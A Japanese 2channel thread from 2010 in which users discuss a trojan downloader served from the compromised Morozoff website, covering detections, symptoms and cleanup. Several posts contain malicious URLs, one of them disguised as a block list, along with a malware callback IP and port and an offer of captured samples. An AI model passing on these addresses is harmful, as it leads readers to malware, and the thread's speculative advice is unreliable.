gred Anti Virus アクセラレータ入れてる奴どうだったの？
avast等が反応したんだから当然検知できてるんよね？

>>634
JavaScriptによって落とされたウィルスによって挙動が違う。大体以下の４通りのパターンがある。
　・ActiveX
　・Flash
　・AdobeReader
　・Java
だから、同じ挙動をするとは限らないの。
それぞれ、最新にしていれば問題ないが、注意がある。

ActiveXは、WindowsUpdateが必要。
AdobeReaderは、最新版でもだめ。AdobeJavaScriptつー、Reader内の設定を切る必要がある。
わからなかったら、AdobeReaderアンインスコ。

分かったか？

ID:TXsQW+OZだが、インストール後再起動したら、
パスワード入力とかの前にいきなり真っ黒な画面に白い文字でavastなんちゃらって出た
ウイルススキャンしてるみたいな画面だったんだけど、ESC押したら通常通り起動した
これは何だったの？
時間かかるけどそのままにしておかなきゃ駄目だった？

>>634
じゃ大丈夫じゃね-の
ｵﾚならｽｷｬﾝくらいするが

>>645
エンコ止めろよｗｗｗ

なんで突如モロゾフスレなんか立てたんだろう
そのスレの>>1が犯人だったりすんのか？

>>645
NEGiESとか入れて通信を監視すればいい
ブラウザを閉じてると通信してないから
それでも何か居るってことは感染してる可能性大

http://www.dotup.org/uploda/www.dotup.org529716.png

MSEよくやった
さっき手動で定義を更新しておいてよかったわ

火狐でNoScriptな俺には関係なかった

>>639
ウィルス関連のスレが立つたびにこいう情弱が1人ほど湧いてくるなｗ

国名 地域名 都市名
JAPAN OSAKA OSAKA

検出されたウイルス（ワーム、スパイウエア）
Trojan-Downloader.JS.Agent.ewh
詳しい説明 : 日本語 | 英語(オリジナル)

また大阪かよ・・・

>>645
noscript入れてりゃ大丈夫だって

>>659
JR東日本もやられたけどね。

ぁゃιぃサイトをはじきたいならこれでも入れておけ。
http://www40.atwiki.jp/peer_block/pages/27.html

>>659
モロゾフは神戸だぞ。
手塚の漫画にも載ってたろ。

>>645
スクリプトがトリガーなんだからnoscript入れてて反応しないのは当たり前だろｗ

>>663
ゴンチャロフと姉妹店かなんかになってんの？

ノートン先生の人は感染されたかどうやって確認するんだよ
余計なものはインストールしたくない

>>660
499 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2010/01/05(火) 00:10:12 ID:zInc2PW00
お前らモロゾフのHP見てみろ
http://www.morozoff.co.jp/

これでわざわざ許可して見ちまった(´・ω・｀)

>>664
専ブラだとスレのスクリプトに反応しないんだっけ？

>>667
お前も同罪

>>663
鯖は大阪にあるんじゃね？

>>665
むかーしモロゾフの従業員が独立したとかって聞いたことあるな
>>667
意味ねーだろw

そもそもこんな菓子屋風情のサイトのスクリプトなんて許可する必要が全く無い
菓子屋なんてオレの人生にとってはエロ画像１枚分の価値もない

>>649
reader　を最新にして javascript 切っておいた。
それ以外は最新だったよ。
プロセスにも　tmp　って拡張子は無いし
何か解りやすい症状ってあるの？

モロゾフのサイト踏んだら重くて
真っ白の状態のまま引き返したんだけど
グーグルキャッシュで見ちゃったから。

>>667
許可したんかよｗ
じゃあ知らんわ・・・

なんでバスターはこんなにゴミなの？

危ないサイトを弾きたい人は以下を登録しとけ
http://wndwo.kongidc.cn/wlgm/su.htm
http://mefa.ws/2/news.php?s=1c1804616b

いままでノーガード戦法だったけどavast入れたくなった

ロシア人は信用できない

>>654
自信ないんでLANケーブルごと抜いた。
ノートン対応するかちゃんと検査・駆除方法でるまでずっとエンコだけやらせとくわ。
ふんでないPC対策してネットやるよ。

>>667
NoScript意味ないし関係ね-じゃん

許可したやつがアクセスしてこのスレ大丈夫か？

>>672
ホンダもやられてたぜ？

【ホンダ】 「ストリーム」サイトに関する報告とお詫び
http://gimpo.2ch.net/test/read.cgi/owabiplus/1261991570/

Vista以降の標準ファイアウォールでは何らかの警告は出ないの？
おれはXP SP3でJetico1使ってるけど

>>673
不明

>>664
え、そうなのか。

>>677
無料だし入れとけ
少なくともAVGより軽いし

web改竄マジ流行ってんな

>>683
まったくなし、UACたんも沈黙

>>653
まあ、普通に考えればそうなるな。

iron+aviraで踏んだけどうんともすんとも言わないぞ

>>662>>676
　　 n　　　　　　　　　　　　　　　 n
　（ヨ ）　　　　　　　　　　　　　　（ E）
　/　|　　　　_、_　 　　 _、_　　　　|　ヽ
　＼ ＼/（　,_ﾉ` ）／（ <_,`　）ヽ／ ／ ｸﾞｯｼﾞｮﾌﾞ!!
　　 ＼(uu　　　　　/　　　　 uu)／
　　　　|　　　　　 ∧　　　　　/

改竄されたのってやっぱり7時以降なのかな
5時台にAVGで普通に踏んだけど

パソコン詳しくないんですけどチョコのケーキみたいなサイト出てきて
許可しますかみたいなバー出てきて許可しなかったんだけど
これで大丈夫？

>>676のURLをaguseにぶち込んだらavastたんに怒られた

>>694 まじか

>>653
そのｽﾚの1ってPLT持ってるってことだろ？
ｽｹﾞｰ計画的じゃん

>>102だけど
avastたんインスコして、線引っこ抜いてスキャンしたが
何も出なかった

>>695
まじだ

>>693
おいらも許可しなかったけど勝手にJAVA起きて
トロイが検出された
タスクトレイにコーヒーカップみたいなマークが出てたら、
念のためにスキャンしときなさいな

こりゃ明日はクレーム祭だな

行ってみたけどJavaが85.25.73.253:8080に繋ぎにいってブラウザ強制終了した
これってFWで8080のアクセスブロックすればセーフじゃないの？

>>667
morozoff.co.jpだけなら大丈夫じゃない、superaguide.ruまで許可したなら駄目かもしれないけど

このPCノーガードだから踏めないわ

モロゾフ　鑑定スレで踏んでいまフルスキャンしてる
win7だけど大丈夫かな

>>696
途中まではウイルスの話題なんて出なくて
平和に進行してたんだよね
俺もHP普通に踏んでコップの話してた

で昼寝して起きたらウイルスの話が出てた
途中から異変が起こった気がする

このスレ開いたらavastちゃんに怒られたじゃん

うわ、検出されたわ
まじうんこ

ノーガードで大丈夫だと思ってるバカはオンラインスキャンでもしてみればいい

ウイルスのいるところを教えてくれ

>>701
まぁ、何もしないよりはマシレベルかな。

>>676
死ね

>>699
そういや右下に珍しくコーヒーのマーク出てたような…
今は消えてるけど…

ウィルスセキュリティ開いてウィルス0件だったから大丈夫かな？

>>707
オンラインやりたかったけど
シマンテックは対応してないし
カスペは休業中だし、
ウイルスバスターは無反応だって言うしで
結局avast入れたわ

でモロゾフの中の人は今なにしてんの

>>693
多分大丈夫だとは思うけど
>>699のいう通りｽｷｬﾝしときなさいって

食品メーカーとかって明日（今日）から仕事はじめだろ？
大変だなあ…

>>713
家でセックス

>>713 寝てる

サイトを踏む前にチェッカーをどうぞ。

http://www.aguse.jp/

>>701
85.25.73.253はドイツだなｗ
IPアドレス 85.25.73.253
ホスト名 gw.kaatajat.net
IPアドレス割当国 ドイツ ( de )

>>707
個人情報入ってないし、サブだから気にしない

>>712
ニフティどうぞ

踏んだけどノートン先生がブロックしてくれたみたいだ

http://www.nifty.com/security/vcheck/

中身カスペだから

>>713
そりゃ寝てるだろ
明日悲鳴をあげるのも確かだ

aguse通しているのに検知されるのはなぜ？

command.datに以下を追加
aguseでチェック=http://www.aguse.jp/?m=w&url=$TEXT$LINK

>>720
ゾンビは周りに迷惑かかるから切断してくれ

ノートンなら躊躇なく踏むけど、ZEROだと無理ｗ

>>719
DNSがロシア。
DNSから名前引きされたアドレスは、ヨーロッパのどこか。

と言われてる。

>>721
>>723
こんなの今はあるんだ
ありがとう

>>463
それは文字として張られてるだけでスクリプトとして読まないから問題ない

>>725
敏感な年頃

>>720
踏み台にされて
PCを証拠品として提出と有るかもなw

>>707
たまにspybotとオンラインスキャンするけどトラッキングクッキーくらいしか反応しないんだけど？

>>723
これでもantivirでも検出されなかったんだけど
大丈夫なのかな

>>723
さっきいきなり切断された件

MSEうんこすぎわろた
一個ずつ消せるのかと思ったら誤検出もまとめて全部消しやがった
しかも圧縮ファイル丸ごと消すとかふざけんな

ノーガードの俺最強
８年でトロイ２回
最強
winMXで無傷
最強

>>728
俺、ウィルスセキュリティZEROだよ

よくセキュリティー対策のためにFirefoxとか使ってる人いるけど、
OSがVista/7 で、ふだんから一般ユーザーとしてログインして、IEを保護モード(標準で保護モード)なら、
FirefoxよりIEのほうが安全

>>707
w3mメインの俺勝ち組

>>734
だからなに？なんで疑問形なの？バカなの？

>>733
それでﾛﾘだのｳｨﾆｰだのが出てきて顔面ﾌﾞﾙｰﾚｲ

>>740　mazikayo

なんかつーちゃんねるもすみずらくなったなあ

ウイルスファイル確保した。
研究用に必要な人いる？

よくコードが仕掛けられたサイトで検出するかどうかで比較してる人がいるけど、
本当に検出が必要なのは、ダウンロードされるマルウェア本体だな

>>746 http://gunkanmaki.jog.buttobi.net/
に送ってやれ　軍艦さんそういうの好きだ

>>609
サンクス。

AVGでコンプリートスキャンしたけど何も出なくて、
AVAST入れてコンプリートスキャンやってみるかと思って
AVGをアンインスコしたらFireFoxにアドビの変なアドオンが一瞬でインスコされたっぽい。
あとFireFoxが強制終了された。どっちが先に起きたかちょっと混乱してて憶えてないけど。

あとAVGをアンインスコした後の無防備状態で激しいディスクアクセスが生じたんだけど
これって外部からアクセスされたんかなぁ。
AVASTのインスコ作業やってる時以外もアクセスが凄かったんだけど。

苦情入れてビン入りのプリン貰おうぜ

プリンはパステル派

>>734
spybot(笑)

http://www.dotup.org/uploda/www.dotup.org529809.png

知ってるよ安藤美樹の彼氏だろ確か

No script入れても>>1のURL踏むとavastが反応する

>>723
カスぺエンジンは使ってるんだが定義ファイルの更新が遅いのか、
GENO騒動の時もカスぺは検出してるのに、ニフティは無反応だった。
その後もウィルス対応度を検証したが、やはりカスぺとは違いすぎた。

>>748
まだ生きてたのかｗ送っとく

>>749
つーか何故その状態で回線切らねーんだよ
おとなしくしとけって

gredで調べたら安全って出たｗ役に立ってないｗ
aguseはちゃんと検知した

ロシアに飛ばすのか
さすがモロゾフ

>>745
そうか?
以前は2ちゃんのリンクを無防備で踏む方が悪いって踏んで酷い目に遭ってる奴が叩かれてたろw
今は貼った奴が叩かれるんだからかなりまともになっただろ｡

ノートン先生大激怒
ttp://www.sheep-planning.biz/ovini/download/1262621072.JPG

さようならAVG
10年間どうもありがとう

>>759
でもなんか危機感に欠けるな
http://www.dotup.org/uploda/www.dotup.org529817.jpg

私家族でパソコン使ってるけど親父の買ったアンチウイルスソフトがバスターだった　死にたい。。
　　　　　∧＿∧
　　　　　( ﾟωﾟ　)　ウイルスは任せろー
　ｶﾘｶﾘ Ｃ□l丶l丶
　　　　　/　　(　　 )　やめて！
　　　　 （ノ￣と、　ｉ
　　　　　　　　しーJ

このｽﾚ自体にｱﾊﾞｽﾄさんが激怒してる

Trojan-Downloader.JS.Agent.ewhがどうこうでるね

易々と改ざんされてしまうってセキュア的にどんな脆弱な作りなんだ。
ホンダやJRとか…。

>>761
昔はブラクラチェッカーとかで確認してから飛んでたけど
だんだん無防備にクリックするようになって
いつの間にかブラクラチェッカーも閉鎖してたｗ

C:\DOCUME~1\ALLUSE~1\APPLIC~1\51590828\51590828.exe
C:\WINDOWS\TEMP\~TME.tmp
_ex-08.exe

^TME.tmp←webに仕込まれたファイル

>>769 １２月に閉鎖した　ソスチェカ

モロゾフ詰んだな

aviraに乗り換えた途端こういう事件起きるし
avastとaviraどっちがいいのかわからなくなってきた

>>768
どっちも下請け任せ。
その下請けは中抜きだけして孫請けに。
孫請けはSOHOの個人に発注してたりする。

土建業界じゃとっくに禁止されてる事がまかり通ってるのがIT産業(笑)

>>673

あんたマカフィーか？
ちなみに、おまえはオレとおなじく白だｗ
言うなれば、ここの祭り騒ぎしている奴等とは違う次元にいる。
参加したいだろうけど、危険だから止めとけ。

あと、今のセキュリティ設定は熟読してキープしとけな。

テンポラリインターネットファイルの中のはトロイ本体じゃないよ
やられた奴は、そんなの検出したところでトロイ本体も削除しないと意味無い

>>769
インターネットを始めた頃はノーガードだったな。そんなソフトも皆無に近い状態だったし。
そもそもPCを持っていて回線につなげている奴があまりいない時代だった。(´・ω・`)

windowsupdateとバックアップ作成終わった
avastとzonealarmインスコしてこまごましたのは寝て起きてからにしよう

まだマカフィのフルスキャン半分行かねーwwwwww

それでも俺はAVG7.5を使い続ける

>>762
侵入検知したのはいいけど、トロイはちゃんと削除した？

今、このスレ開いたらトロイのバルーンが‥‥？

やばいのはトップページだけ？

対象プロセスの停止とファイルの削除をすればひとまず駆除完了
場所は>>770のような場所にある。プロセスチェッカーを使えばすぐ判明する。
スタートアップにも登録されてしまっているので解除しておく。
他ファイルへの感染はなし。

念のためtempとIEのキャッシュは全て削除しておく

中国のサイトで画像漁ってたらトロイよく踏むけど、一瞬で駆除されてるよ
今のＰＣってトロイくらい対策してんじゃないの？新型とかでもない限り

（PDFの中身）
Rift tipoff cobble donor sake tt heel saw lies rift fist.
By at from of out through answered the this. Answered the this ismyron frock dave fist. Up according as after
behind over under by at from of.
Cobble donor sake tt heel saw lies rift. Fist rem tipoff cobble donor sake.
Through answered the this ismyron frock dave fist rem tipoff cobble. Saw lies rift behind over. Rift donor
sake tt heel saw lies rift answered.
Under by at from of out through answered the this ismyron frock. Cobble donor sake tt heel.
Cobble donor sake tt heel saw lies rift. Under by at from of out through answered the this ismyron. Out
through answered the this ismyron. Under by at from of.
Into to without upon up according. Upon up according as after behind over under by at from. Without upon
up according as after behind over under.
Dave fist rem tipoff cobble donor sake tt heel saw lies rift. Tt heel saw lies rift for.
Rift donor sake tt heel saw lies rift in for.
In for on into to without upon.
Donor sake tt heel saw lies rift frock dave fist rem tipoff. By at from of out through. Up according as after
behind. Sake tt heel saw lies rift into to without. Frock dave fist rem tipoff cobble donor sake.
Of out through answered the this ismyron frock dave fist rem tipoff. Frock dave fist rem tipoff cobble donor
sake.

>>773
aviraは感染してから飲む抗生物質。
avastは予防用のマスク（ウィルスが付くと色が変わる的な）→普段は息苦しさを感じる

俺はこういう認識

http://www.dotup.org/uploda/www.dotup.org529840.jpg

>>777
自分の頃は、PCのスペックが低いから
アンチウイルスソフトが全部重くて
まともに動くのがAVGしかなかった
当時から一緒に歩んできたAVGと今日決別したｗ

>>753
ウイルスバスターが一番重くしている原因だ！！

モロゾフがなんだかわかってない奴が半数

>>774
そうなんだ…。('A`)

Firefox+NoScriptでないとかわせないっぽいな。
Java最新にしててもダメ。ひどいなー。

>>783
やめとき。GENOの場合、大体ほとんどのページにウィルスしかけるから。

火狐で見てみたけどMSE反応ない
大丈夫かいな(´・ω・｀)

2010/01/05 1:24:44 IMON アーカイブ http://tsushima.2ch.net/news/dat/1262611814.dat JS/TrojanDownloader.Agent.NRL トロイ 切断されました

>>791
お前から童貞かつ貧乏の臭いがする。

１０００取り合戦が近い
次スレどうする？

バスター消すとサクサク軽快

>>793
試しに一時的にJavaScript許可してみたらAdobe Readerが開いて怒った

>>798
俺でよければ

プリン旨いよな

>>801　たのんだぞ

>>787
あぁ、俺もそんなイメージだわ

プリンはパステル

>>789
AVGはザルなのかw
フリーだとavast/Avira/MSEしかないな。

>>676
これ凄い最低なサイトなんだろうね。
Google Chomeたんから、　メッ！したらダメだぞ！って怒られた。

ちなみに、ドメインがcnの方は開かなかったけど。

またGENO亜種か

>>800
どうもね、PDFとJavaScript+Flashの2種類の攻撃をしてる気がする。
PDF自体にも何か罠が仕掛けてる可能性は高いが、
PDFを保存しただけでJavaが起動するってのはありえんから。

>>806
MSEたんも今回はダメみたい

【レス抽出】
対象スレ：モロゾフの公式サイトでトロイ配布中
キーワード：GENO

抽出レス数：9

みんな意外と覚えてるんだな・・・

>>806
ザルじゃねーよ
恥ずかしがり屋でおとなしい娘なだけだ

バスターはどうだったの？

>>683
あ！おいらが何も無いのはVistaだからか。
なんだ、Vista大勝利じゃねーか！ｗｗｗｗｗ

ちなみに、VistaSP2だけどサクサク軽快中ｗ

>>813
まだ正月休みみたい

>>806
10年間AVGで無傷だったけどね
多分AVGでも大丈夫ｗ

>>778
ﾊﾟｽﾃﾙはうまい
ｺﾝﾋﾞﾆﾌﾟﾘﾝもうまくなってきてるけどもう一つだと思うわ
なんかｵｽｽﾒ教えてほし-の

やっと削除してくれた

>>806
ザルなんかじゃねぇよ
「なにみなさん騒いでいらっしゃるの」って
タスクバーで不思議そうにしてるんだぜ

>>810
専用スレだと最新定義で大丈夫みたい。まぁ踏まなければ問題ないか。
でも亜種がたくさん出てきそうだから、これからもいたちごっこなんだろうな…。

新年早々ノートン先生に怒られたわ
しかも危険度高ってやばいな

>>781
リーダでなかったけど一応キャッシュ消してフルスキャンやってる

踏んだけどTM108.tmpがプロセスに
なければ大丈夫なの？

avastが大誤検出祭りやらかして利用者が去った数日後にavastだけが反応するウイルスか

C:\windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe


やべぇ

>>824
avastたんはそんなことしない！……よね？

リーダのJavaScriptオンにしてたらどうなるんだ？

モロゾフの公式サイトでトロイ絶賛配布中　2
http://tsushima.2ch.net/test/read.cgi/news/1262623225/

はい。

>>827 あぼーん

>>739
俺もウイルスセキュリティだけどぶおーんぶおーん言ってる

>>828
乙
だがｵﾚは明日会社だ
もう少しで寝る

>>828
おつ

>>825
そのディレクトリなら大丈夫だよ。2年前のDropper/BlackHoleってウィルスだと、
その名前のファイルをそこじゃなくてC:\WINDOWS\System32\に落とす。

・・しかし、そこに実行ファイルを落とすウイルスが現れたらそりゃ追跡が難しすぎるわ。
まさに砂漠に落ちた針だ。

>>817
西通りプリンてうまいよ

>>588
スキャン終わった

検出された項目　　　　　 警告レベル　　　　　実行した操作
Adware Win32/DoubleD　　　　 中　　　　　　　　削除済み　　
VirTool:Win32/Ceeinjeitgen!A 重大　　　　　　　削除済み

説明　このプログラムはウイルス、ワーム、またはその他のマルウェアを作成するために使用されます

>>814
VistaのFWは自分で設定しないとザル

ぶっちゃけトロイ如きで騒ぎすぎｗ

JRE最新/Flash Player最新/Adobe ReaderのAcrobat JavaScript有効
FireFox＋No scriptでトップページに接続（FLASH画像不表示）
JavaScript許可→FLASH動画表示（数秒）
現在マカフィーフルスキャン中70％→まだ無検出

大丈夫かな・・・

このスレ　1000取り合戦スレになるよかn
次スレhttp://tsushima.2ch.net/test/read.cgi/news/1262623225/

>>834
ありがとう
ﾒﾓった
明日がいろんな意味で楽しみになった

今回はJavaScript→Java→PDFか
Sunも死刑

foxitの俺は大丈夫なのか

次スレでトロイ検出　どうなってんだこりゃ

http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.morozoff.co.jp%2F&x=45&y=8
アウトｗｗｗｗ

やれやれ、ひどい目にあった

マジかよ糞箱売ってくる

iron→avast反応無し
プニル→有り
IE→有り
火狐→有り

>>843
変な文字列が張ってあった

とりあえず踏んだけどプロセスにtmpファイルなきゃ大丈夫っぽい？

ざまあｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

AVG Freeは最新版だとWindows Defenderが無効化される…
これを機にavast入れてみたんだがAVGと一緒にタスクに常駐させてても問題ないよね？

>>811
GENO に一致する日本語のページ 約 503,000 件中 1 - 50 件目 (0.29 秒)

他のキーワード: GENOウイルス GENOチェッカー GENOウイルスまとめ geno 福袋 geno まとめ

次スレにトロイコードはったヤツ誰だYO

>>852
福袋ってwww

>>758
AVGとAVAST一緒に動かしちゃいかんかと思って余計な気を回したのが不味かった…
いまAVASTでフルスキャンしてる

>>824
実に面白いですよね

GENOウィルス踏んだおかげで会社クビになっててその後すぐ再就職決まった人は
元気にしてるだろうか？

Avastってずっと無料なの？

JBiPhoneで踏んだらどうなるの？

>>835
＞VirTool:Win32/Ceeinjeitgen!A

クリーンインスコした方が良いと思うよ。
あと使ってるサイトのパスを全部変更しといた方が賢明。

ブラウジングしてトロイ検出したこれがサイト初めてだわ

こういうのある時っていつもセキュリティーソフト会社の陰謀かと勘繰るよね

>>858 ライセンスキー１ヶ月以内に放りこめば１年タダ
１年ごとに新しいやつ中の人がクレっていうからな

Avastってシャットダウンの時に固まる不具合直ったの？

ID:UMFLUqbi
なんという馬鹿・・・

>>863
なるほど

次スレどうなってる？

次スレにトロイコード貼ってあるとか書いてあるから怖くて踏めない

>>860
そうなのか・・・・
あんたと

これってウブントゥとかlinuxで発動する？

Avastのサウンド切ってないアホがなんでこんないるの

一体なんだこのスレは
わざわざウイルス踏んでクリーンインスコやらウイルススキャンやらしてマゾの集まりか？

>>865
こういうのﾏが抜けた勇気
まさに男気だと思うわ

zoonaraamuがなんかJavaが接続したがってるよって教えてくれた
aviriaはなんも言わない

>>870
JavaGame.jarを見る限りWindows以外のOSで実行されると何もせずにそのまま終了

トロイコード消えるまで次スレ見れない

ちょっくらoutpost入れてくる

>>872
ふだんアンチウィルスソフトが反応することってほとんどないからつい試したくなっちゃうんだよね
で、踏んでみてちゃんと反応してるか、働いてるか確かめたいみたいな

>>142
ああJRE更新してれば問題ないのか
反応しないからおかしいなと思った

>>875
サンクス、感謝する
なら去年だか一昨年だかの夏に入れたウブントゥを発動するべきかな
専ブラ変えねばならんが

avast先生まだ怒る
http://tsushima.2ch.net/test/read.cgi/news/1262623225/
トロイコード貼り付けた香具師のせいで

>>872
たまたま観た画像スレでたまにしかやらないスレの「全選択」をして開いたリンクの中にたまたまこのURLがあった
なんという強運の持ち主なんだ俺は

>>142
CVE-2008-5353ではないだろこれ・・・

avast最強伝説

>>881
次ｽﾚの>>11だな
別に問題ないと思うの

>>883
じゃあなんなの解説よろ

>>881
情弱はν速から出て行け









■2chのスレを2chブラウザで開くとウイルスを検出する

Q．2chのスレを開くとウイルスを検出します。
A．ただのテキストのコードなのでウイルスに感染することはありません。
　　この誤検出しないようにするには、以下の対策を行う必要があります。

タスクトレイのavast!アイコンをクリックして
webシールド→詳細な設定→例外タグ→追加で信頼しているサイトのURLを追加する。
例：http://*.2ch.net:80/*　（２ちゃんねるのスレッド）

標準シールド→詳細な設定→追加設定タブで
下のところにある除外設定で専ブラのログ拡張子を指定するかログフォルダ自体を指定する。
例：*.dat
例：\Logs\*

※上記で解決しない場合は以下の設定も行ってください。
avast!の標準シールド or webシールドの感度を [普通] に設定にする。
2chブラウザでWebシールドを使わないように設定
ttp://ansitu.xrea.jp/guidance/?Trap#avast

>>887 �d

>>881
いい加減うぜーよ情弱

除外設定も出来ないならavastアンインスコして有料ソフトでも使ってろ！

アンチウイルスソフト使ってないんだけど
やばそうだな

ソースチェッカーオンライン　って閉鎖したの？

>>886
ウイルス落としてきて実行しているだけ
脆弱性も糞もない

CVE-2008-5353
ttp://www.milw0rm.com/exploits/8753
そもそもMac OS X（ｒｙ

>>891 閉鎖

>>890
最近は上場企業のサイトが犯されまくってるからな。
攻撃手法も従来とは変わったのが多いし。
「ちゃんとアップデートしてる」「変なサイトは見ない」では危険すぎると思う。

エロサイトより危険だろこれ

>>894
スーパーハカーが活躍してんの？

値切りしまくりだから大手といえど穴があるサイトが多いんだろうな
あとは使ってる部品の穴か

>>892
そのウイルスがjavaの脆弱性をついてjava上で実行されるんじゃないのか？

>>896
ｽｰﾊﾟｰﾊｶｰというより高い技術を持ってるのに報われない人達が多いと思うの
お金も時間も精神も肉体も報われないの

だからプリンはパステルにしておけとあれほど

リンク踏んだけど、Windows7+Chrome+ﾉｰﾄﾝｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨじゃ何も反応しなった・・・orz

>>898
ﾄﾛｲ本体を引っ張ってくる

マカフィーでフルスキャンしたけど無検出だったわ
とりあえずAcrobat JavaScriptを無効にしといた

>>833
どうも調べていったところ連鎖的にセキリティホールを作ったり木馬系ダウンロードしてるみたいなのね
system32のsvchostも汚染されてcpu使用率マックスだわ（笑）　4コア中１コア占拠する

世界中に接続しにいってるようで踏み台はめちゃめちゃ多そうだ。
危なすぎるから生のPC１台使って実験した方がいいわ。

仮想PCでももう入れたくない。

大手が狙われるなら俺の弟の会社も狙われてくれないかな
兄である俺が無職なのに弟が大企業本社勤めなんて許されないよね

vista

>>898
Javaの制約から解き放たれたのにまた牢獄入り？
一般ユーザーですら管理者並みの権限を持つWindowsで小細工をする必要ないだろ

>>901
vista + ノートンだけど開いて即遮断された。

acronisで復元した。
もう絶対踏ませるなよ。

>>907
詩人になる前に具体的に解説してくれ
そもそものTrojan-Downloader.JS.Agent.ewhってなに？

>>905
(ﾉ∀`) ｱﾁｬｰ
更にあなたが感染してたら最高なのに

>>908
ｶﾞｸｶﾞｸ((((ﾟдﾟ))))ﾌﾟﾙﾌﾟﾙ

>>901
俺もちょろめの派生のブラウザ使ってるけど反応しなかった

怖いからmorozoffをNGに入れといた

>>910
「何も知らないユーザーがこのURLをクリックしてWebサイトに行くと，
最初のマルウエアがダウンロードされる。
この最初のマルウエア（ダウンローダ）が次々に別のマルウエアをダウンロードすることで脅威が広がる。」
ttp://itpro.nikkeibp.co.jp/article/Interview/20090330/327447/

Trojan-Downloader.JS.Agent.ewh = ダウンローダ

>>910
JSでﾄﾛｲをDownloadするAgentじゃね？

>>377
とりあえずWinアップデートした（自動更新切ってたので12月の分はやってなかった）
Javaも6_16だったので手動で更新
AdobeReaderはインストしてないFlashPlayerは最新版だった

これで仕込まれたサイト踏んでも安心かな

>>911
ビビリだから進んで感染なんてできないわぁ
弟の家に住まわせてもらってる身としては弟のPC勝手に使って踏むわけにもいかないし

このスレは大丈夫だよな？

>>917
むやみに踏んじゃ駄目お。

>>918
世は下克上ですぞ…

JAVA_BYTEVER.AT発見orz

>>918
こいつ無職会の一番風呂じゃね？ｗ

>>912
HTTP Fragus Toolkit Download Activityとかいうリスク名。
詳しくないんでさっぱりだが、守ってくれたのは間違いなさそう。

>>905
強く生きろよ

>>918
それならば、だからこそそこは踏んでおくべきだわ
しかもﾉｰｶﾞｰﾄﾞで
住む場所もなくなったら元気出ると思うわ？

私なんか新年早々振られたわ
死にたいわ

モロゾフって何？ウォッカの会社？

チョコレート屋だろ

にゃるほど、Temporaly InternetFilesのhtmに検出されたのは、
トロイを呼び込むスクリプトなのね。
それで、Redirectorって名前なのか
でも、トロイを呼び込むスクリプトもトロイって言わないの？

一番風呂の弟は警官だっけか

>>918
あんたはクリスマスの天下一無職大会に出ればよかったのに

>>929
だから、Trojan-Downloaderって名称だろ。

ま、まじかよパソコン蛾ぶっ壊れたから糞箱売ってくる

おい！更に放置したらexeがどんどん増えて帯域もどんどん上がってるぞ
放置すればするほど駆除が難しくなるぞ

さっきからC:\WINDOWS\system32\wuauclt.exeとやらが動きっぱなしだわ
ｵﾜﾀ

>>934
あたりまえじゃんwwwwww

trojanってトロイって読むのか？

うわ　管理共有にアクセスされた

モロゾフにウイルス混入

無職会のときは実家で一家団欒してたから一番風呂さんとやらではないぜ
なんというか、弟のPCは同居が決まって以来パスがかかってまして、
パスを知らない私としては起動することが出来ないんですよ
とりあえずVPCで踏んでみようかな

ID:xLXP6C60をヲチした方が面白そう。

MSEで駆除完了エクスプロイトjava.5353.c1つとトロイjavak.Lが1つずつ見つかった

>>915-916
やっぱJavaScriptなんだよね
じゃあgenoの時と同じでまずJavaScriptがオンだと本体（？）がDLされる(>>36)
→脆弱性（genoのときはflash player、今回はJAVA）を利用して実行されるってことかな

というかうちの環境だとそもそも>>36を直踏みしてもエラーでダウンロードできないんだが
右クリだと保存できるけどMSEで即効除去される

>>940
何で書き込みしてるん？

以下ID:xLXP6C60の実況でお送りします

ID:xLXP6C60のはVPC上で観察してるんだろ
まさか実機でやってるわけ・・・

>>940
踏んで欲しいけど
私の理性をﾌﾙ稼動して
辞めておいたほうがみのためだと思うの
伝説作る気？

ネットブックじゃね？

>>938
急いで666プロテクトをかけるんだ！

うおおおおおおおお！！！！
ファイルパクられてるうううううううう

スキャンしてみたけどとりあえずセフセフっぽい
ふぃー

モロゾフオワタ

>>950
可能であればスクショも貼って

>>54
そのとおり
英語読みすればね

Trojan はもともとラテン語の Troia、
つまり Troianus の、っていうラテン語を英語表記にしたもの
ラテン語の i は i の音と j の音を兼ね備える

Troia（ラテン語の発音はトローイア）
↓
Troian（新英和大辞典によれば 1338年当時の表記）
↓
Trojan

いやID:xLXP6C60はネタだろ常識的に考えて…

SMSvcHostProcess　汚染

ｱﾗﾊﾞﾏは嘘つきだってばっちゃが言ってた

でも外人って甘い環境作ってるとすぐ入ろうとするよね。

イタリア語は発音と表記が一致してるから比較的簡単らしいね
イタリア語が世界共通語になればいいのに

>>944
弟からもらったXP機を使ってるよ。
あいつはi7とHD5850でWin7動かしてやがる
>>947
気をつかってくれてどうもね
とりあえず新年だしフラれたぐらいで死ぬなよ

クリーンインストールするしかないのか？
クレカで二日前にクレカで買い物したんだが、PCにデータが残ってたりしたら
悪用されるかも知れないんだよな？胃が痛くなってきた。

>>954を訂正
トローイアじゃなくてトローヤ(ja で　ヤ)

>>960
ありがと

>>961
良からぬもの踏んだらクリンインスコ推奨だけど
クレカ悪用なんてそうあるもんじゃないだろうし
被害にあっても何らかの保証はあるんじゃなかったっけか？
暗証番号バレは対象外か？

まずaguseとかgredとおせよｗ
いきなり踏むとかねえよｗ

>>961
クレカは引き落とし前に明細来るでしょ？
それ見てから止められるよ

あーあ、avastのスキャンかけてたら今開いてるプログラム以外起動しなくなったわ
どうすんだよまじで

Etherealさんがパンクしてきた

とりあえずスキャン終わるまで待てや。

おいおいMSE無反応だぞ
operaだからセフセフなのか？

>>970
アップデートしてないとアウト。ゼロデイ

ゼロデイじゃなかった

>>964
あくまでも状況によるらしいよ
暗証番号われも
ｶｰﾄﾞそのものを盗られた訳じゃないから
暗証番号の管理もｶｰﾄﾞ所有者の管理の過失がうんたらかんたら

ｶｰﾄﾞ会社が利用状況がおかしいと判断できる余地があるかどうかみたい

例えば世界各国で同じ時間に使われたとか

いずれにしても情報窃盗は判断が難しいみたい

ちょうど >>1 のスレが立ったときにモロゾフのサイトを見たんだが…
感染してるかしてないかを確認するにはどうしたらいいんだ？

JAVA(TM)が17だったら大丈夫なのか？

トロイに感染すると弊害あるの？

>>974
ウイルス対策ソフトでスキャンしろ

>>974
俺もそのスレが建った時プリンの入れ物見るために見た
一応スキャンしといた方がいいんじゃないかなと思ってしてる
